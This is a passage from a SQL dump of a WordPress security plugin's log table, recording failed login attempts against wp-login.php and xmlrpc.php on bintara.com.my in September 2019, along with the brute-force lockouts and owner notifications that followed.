empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmOViJ7D9Gn7wDPh8hpgAAAM8\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"67.212.233.12\";s:11:\"REMOTE_PORT\";s:5:\"50512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmOViJ7D9Gn7wDPh8hpgAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072697.4623\";s:12:\"REQUEST_TIME\";s:10:\"1569072697\";}}','notice','2019-09-21 13:31:38','2019-09-21 13:31:37',18313568,19610856,'https://bintara.com.my/blog/xmlrpc.php',1,0,'67.212.233.12'),(25954,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmQbfBTP0kPOVnb8juqAAAAEI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"48502\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmQbfBTP0kPOVnb8juqAAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072705.6546\";s:12:\"REQUEST_TIME\";s:10:\"1569072705\";}}','notice','2019-09-21 13:31:46','2019-09-21 13:31:46',17801032,19292744,'https://bintara.com.my/test/wp-login.php',1,0,'148.72.23.181'),(25955,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:31:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:31:46\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:46:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:46:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:31:46','2019-09-21 13:31:46',17885760,19292744,'https://bintara.com.my/test/wp-login.php',1,0,'148.72.23.181'),(25956,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:31:46','2019-09-21 13:31:46',18091904,19292744,'https://bintara.com.my/test/wp-login.php',1,0,'148.72.23.181'),(25957,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmRHkXpgmG5P@iB8ky@QAAAJY\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"49010\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmRHkXpgmG5P@iB8ky@QAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072708.2886\";s:12:\"REQUEST_TIME\";s:10:\"1569072708\";}}','notice','2019-09-21 13:31:49','2019-09-21 13:31:48',18313568,19610856,'https://bintara.com.my/test/xmlrpc.php',1,0,'148.72.23.181'),(25958,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmaliJ7D9Gn7wDPh8hsQAAAMg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"51352\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmaliJ7D9Gn7wDPh8hsQAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072746.9778\";s:12:\"REQUEST_TIME\";s:10:\"1569072746\";}}','notice','2019-09-21 13:32:28','2019-09-21 13:32:27',17800368,19290856,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(25959,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:32:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:32:27\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:47:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:47:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:32:28','2019-09-21 13:32:27',17885272,19290856,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(25960,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:32:28','2019-09-21 13:32:27',18091280,19290856,'https://bintara.com.my/2019/wp-login.php',1,0,'103.15.226.14'),(25961,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmbDDrcQxTmGrCWuaRcwAAAcw\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"52036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmbDDrcQxTmGrCWuaRcwAAAcw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072748.8701\";s:12:\"REQUEST_TIME\";s:10:\"1569072748\";}}','notice','2019-09-21 13:32:30','2019-09-21 13:32:29',18313568,19610856,'https://bintara.com.my/2019/xmlrpc.php',1,0,'103.15.226.14');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (25962,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmpliJ7D9Gn7wDPh8hvgAAANg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"57526\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmpliJ7D9Gn7wDPh8hvgAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072806.4231\";s:12:\"REQUEST_TIME\";s:10:\"1569072806\";}}','notice','2019-09-21 13:33:27','2019-09-21 13:33:26',17798496,19288496,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.188.77.30'),(25963,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:33:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:33:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:48:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:48:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:33:27','2019-09-21 13:33:26',17883120,19288496,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.188.77.30'),(25964,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:33:27','2019-09-21 13:33:26',18088864,19288496,'https://bintara.com.my/wordpress/wp-login.php',1,0,'35.188.77.30'),(25965,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmqTDrcQxTmGrCWuaReQAAAco\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"57892\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.c